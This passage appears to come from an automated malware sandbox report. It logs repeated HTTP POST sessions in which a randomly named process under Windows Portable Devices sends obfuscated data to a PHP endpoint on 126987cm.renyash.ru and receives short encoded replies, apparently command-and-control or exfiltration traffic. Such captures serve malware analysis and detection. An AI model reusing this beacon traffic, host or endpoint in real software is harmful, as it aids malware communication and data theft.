                                                                                                                                Data Ascii: 98"?&#W4"U(+3$1=15A+?<8&'')*+28) \9$_0$+))4] /"Z( ,P7^"%+:0\"U+, (3$&=*Q;=3.Z*,$'24X"5=P$(+V'\=+?!0?1,%&.-:&^ "S?UV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49799 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:56.969068050 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:57.327347994 CET | 1064 | OUT | Data Raw: 54 54 5b 54 56 40 5c 56 5d 56 5b 57 54 5c 51 5f 58 57 58 5a 5b 56 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[TV@\V]V[WT\Q_XWXZ[VWHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!$Z "(%>'#;'T+7#T66'0.*%=>>;%:!^&%X*7
Jan 1, 2025 21:47:57.412930012 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:57.671359062 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:57 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4TDNc1dbza%2Bx5JTpy7TcS%2FrX5svMRTJNcOu2rRwj3l2ZJgLDQ15Xeqn5vdH1kMsoxfOSKWRMpKwvGzfd6qwKt9xgbM3aPuuRietVIi5yVeb3W4g%2FnLRTuvkyyI%2FzkgNaEvbJD4nW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e0f8e05f791-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2470&min_rtt=1683&rtt_var=2205&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1409&delivery_rate=182957&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49805 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:57.796283007 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:47:58.179810047 CET | 1064 | OUT | Data Raw: 54 56 5b 54 53 43 5c 53 5d 56 5b 57 54 5c 51 5a 58 5d 58 5c 5b 52 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TV[TSC\S]V[WT\QZX]X\[RWBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["3[7"!<$.46;?$+!8T$2*)C+0&*!^&%X*#
Jan 1, 2025 21:47:58.240447044 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:58.542028904 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:58 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O0C%2B2HdV1IDxRUpw7KP1Rkvmbrs1R%2FKD2rX0WqUNUL6GLKtYRLPOLbim%2BD83fh%2FPipluA4a8nkOpgl3D5MFUo%2BuZ%2FhNV2Vkjqvg7ugc9n2XDyr21pUPr2DcEgH5NgxOJ7Tiu1rP%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e14b968436a-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3462&min_rtt=1539&rtt_var=4424&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1385&delivery_rate=86252&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49811 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:58.674599886 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:59.030354023 CET | 1072 | OUT | Data Raw: 54 50 5b 51 56 40 59 56 5d 56 5b 57 54 5a 51 52 58 5c 58 50 5b 52 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TP[QV@YV]V[WTZQRX\XP[RWEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!$"$ !! >;[3=" <'W!%(':=%*+ %!^&%X*?
Jan 1, 2025 21:47:59.128249884 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:59.405613899 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:59 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q4fZhRC%2FbPab1UYUqJnHnJTe%2FsS%2Fuy4MuXFX4kpzRzpRMCkg5mUwJwnR6yuenlMhw8rl0a4IYY%2BTKsYWxzw%2B0aGGIo4Cx0hpDPYB3Fb%2BJne8KUfXaejpsKg6jX6bPO0qLfNGqssX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e1a3b2117ad-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4187&min_rtt=1663&rtt_var=5673&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=66782&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49817 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:59.529432058 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:59.874808073 CET | 1072 | OUT | Data Raw: 54 54 5b 5f 53 41 5c 52 5d 56 5b 57 54 59 51 5c 58 50 58 50 5b 51 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[_SA\R]V[WTYQ\XPXP[QWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Z&1 42Z5.('75]'R*4?5'(&=<.('*!^&%X*3
Jan 1, 2025 21:47:59.972004890 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:00.228523970 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:00 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FO77fqMtYe54Lm1CV0%2BMVxhqMBw67vZbX3I72rf9wC91AeKiasszZOBf3piw5pOJ3k90vLEybY4RUnoXu0jk%2B2xTBu85UoZ1eO0lZOENlGyGOfI0bbgW04slGuuZUgxcuvs41T52"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e1f8ff2f795-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3918&min_rtt=1649&rtt_var=5157&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=73715&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 45 | 192.168.2.4 | 49823 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Jan 1, 2025 21:48:00.359385014 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                 Jan 1, 2025 21:48:00.717972994 CET | 1072 | OUT | Data Raw: 54 52 5b 5f 56 4a 59 5f 5d 56 5b 57 54 5f 51 59 58 55 58 59 5b 57 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TR[_VJY_]V[WT_QYXUXY[WWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Z02_""=Z"$%-4" <(#%'#1)56?4&!^&%X*+
                                                                                                                                 Jan 1, 2025 21:48:00.831280947 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                 Jan 1, 2025 21:48:01.096565008 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:01 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BQqvuqi7pYaTk0lJrEdux8PLj2yjl8MupbS%2BhHSvThohXCmTNDkFMgJ8hArVqXr%2BGJ51XAbJ%2FNwyrR1YfAZkh%2BGymsafszuU%2BMJGnx5Kul2Zrdd5SvMDp9pmIac76bI9r3S98chw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e24daab15c7-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4680&min_rtt=1682&rtt_var=6628&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=56871&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 46 | 192.168.2.4 | 49832 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Jan 1, 2025 21:48:01.457510948 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                 Jan 1, 2025 21:48:01.832698107 CET | 1072 | OUT | Data Raw: 51 56 5b 53 56 44 59 55 5d 56 5b 57 54 58 51 52 58 51 58 5d 5b 5e 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV[SVDYU]V[WTXQRXQX][^WBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Z$Y !]"0=$["8((B8!5 S0(6<.(1!^&%X*7
                                                                                                                                 Jan 1, 2025 21:48:01.895823956 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                 Jan 1, 2025 21:48:02.183559895 CET | 816 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:02 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rZRhq6YwqXnNBI0yEYTGQYt8N%2BSyihIBgrU99xgERk9%2F6jyAVv7tLfpf9ywYj%2FKqO7FCJSV88M1Z5I7X4gp3HrTL%2BSuSJweXxiZoz%2FKJ%2BdfQNNbekP%2BP9YF%2FMaMVe%2BME25fbZ6xW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e2b8f4e43c8-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3634&min_rtt=1605&rtt_var=4661&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=81829&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 47 | 192.168.2.4 | 49838 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Jan 1, 2025 21:48:02.375004053 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 48 | 192.168.2.4 | 49839 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Jan 1, 2025 21:48:02.542325020 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1764
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                 Jan 1, 2025 21:48:02.889879942 CET | 1764 | OUT | Data Raw: 54 54 5b 5f 56 4a 59 50 5d 56 5b 57 54 5b 51 5c 58 53 58 5a 5b 55 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[_VJYP]V[WT[Q\XSXZ[UWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Y'"/"2"!'35](<$75'=&<.32*!^&%X*
                                                                                                                                 Jan 1, 2025 21:48:02.999349117 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                 Jan 1, 2025 21:48:03.177386045 CET | 972 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:03 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qByOGkQft%2FdU9kQaTu%2Bi1RCOEi0yeC2OtM86fsDTqCHS%2FdZ1ndFqGSY4lgl%2FXPvq%2B2eklmrbdUFIssRZGKviVAPa2z4wV%2F0oJom0VlE%2F6Hg9uppN%2B%2B6npAlwjl%2Bbwcy%2B%2B3ZHGwnN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e326f13f78d-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3043&min_rtt=1752&rtt_var=3240&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2109&delivery_rate=120800&cwnd=103&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 57 28 26 2b 55 20 0c 3a 0f 2a 3b 27 5a 31 22 32 58 25 20 29 08 2b 16 24 01 28 11 3b 08 26 2c 2b 04 30 04 31 52 3e 32 3c 59 2b 26 20 5c 05 1b 39 5f 27 00 2f 59 25 05 3e 0b 28 23 23 07 20 11 21 06 29 0d 33 0e 21 3b 29 59 32 06 3d 53 33 39 2e 57 2b 12 0d 5e 3d 0e 20 0e 24 2d 2a 51 0f 16 38 57 28 23 26 11 28 2f 38 13 24 32 2b 00 36 35 00 0d 31 28 23 52 30 39 2a 5c 28 3e 16 09 35 0d 3f 53 26 12 29 02 32 3e 37 55 3a 3a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!W(&+U :*;'Z1"2X% )+$(;&,+01R>2<Y+& \9_'/Y%>(## !)3!;)Y2=S39.W+^= $-*Q8W(#&(/8$2+651(#R09*\(>5?S&)2>7U::&^ "S?UV0


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 49 | 192.168.2.4 | 49840 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Jan 1, 2025 21:48:02.680735111 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                 Jan 1, 2025 21:48:03.030379057 CET | 1072 | OUT | Data Raw: 51 56 5b 55 56 4a 59 55 5d 56 5b 57 54 55 51 5e 58 51 58 58 5b 53 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV[UVJYU]V[WTUQ^XQXX[SWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'T/Z7"-X">Z%=0!+((46($3*\*)>> '*!^&%X*
                                                                                                                                 Jan 1, 2025 21:48:03.153477907 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                 Jan 1, 2025 21:48:03.431189060 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:03 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GM6LD%2BR1aZFpq1jgk7r%2Fbt0YkJaC70YN4cbdThB9HXJZ69bbja0mMeD8iOX6Vq5SBFcjciJ5vQjDgU4v3%2FS3SjiMzQYRzeb0tSJ9fKkAouyGplZgss7aJ74arTLzWFnGMEuAWBKw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e336a2defa7-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3758&min_rtt=1958&rtt_var=4335&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=89220&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 50 | 192.168.2.4 | 49846 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Jan 1, 2025 21:48:03.587295055 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
